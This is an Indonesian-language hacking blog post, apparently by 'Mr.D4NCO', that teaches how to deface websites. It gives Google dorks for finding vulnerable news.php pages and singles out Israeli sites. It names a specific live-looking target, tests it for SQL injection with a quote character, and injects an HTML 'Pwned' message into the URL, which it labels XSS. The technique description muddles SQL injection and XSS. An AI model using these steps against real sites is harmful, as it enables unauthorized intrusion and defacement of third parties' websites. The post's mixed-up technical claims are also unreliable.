Cara Deface Website Dengan Metode XSS



Ok guys ketemu lagi dengan gua Mr.D4NCO yang gans :v , kali ini gua akan membahas cara deface dengan metode XSS ya tod :) ok kita langsung ke pembahasan. Cekibrott :v

1. Pertama kita siapkan dork nya terlebih dahalu agar dapt memulai 
belajar deface website.


Ketikan dork di google seperti berikut ini :

inurl:/news.php?id=

inurl:/news.php?id= site.co.il (israel)
Lu kembangin sendiri eaa dork nya janngn manjaa asw :v

2. Kemudian pilih salah satu website target anda

3. Sebagai contoh gua mendapatkan target website untuk di deface, yaitu http://isr-tkd.com/index.php?cntr=e/news.php?id=1


4. Selanjutnya cek website apakan vuln atau tidak, cara nya tambahkan tanda koma atas ( ' ) di akhir id=1'

contoh:

 http://isr-tkd.com/index.php?cntr=e/news.php?id=1'
website yang vuln akan menampilkan error, dengan tulisan seperti dibawah ini:
  • Warning: mysql_result() expects parameter 1 to be resource, boolean given in /home/isrtkd/public_html/press.php on line 4
  • You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''

5. Kemudian lakukan penambahan exploit untuk melanjutkan deface website menggunakan XSS
seperti contoh dibawah ini,

 http://isr-tkd.com/index.php?cntr=e/news.php?id=1%3Ch1%3ETerhack%20Jancuk%20Pwned%20by%20Mr.D4NCO%3C/h1%3E
Maka hasil nya akan seperti ini :

Post a Comment for "Cara Deface Website Dengan Metode XSS"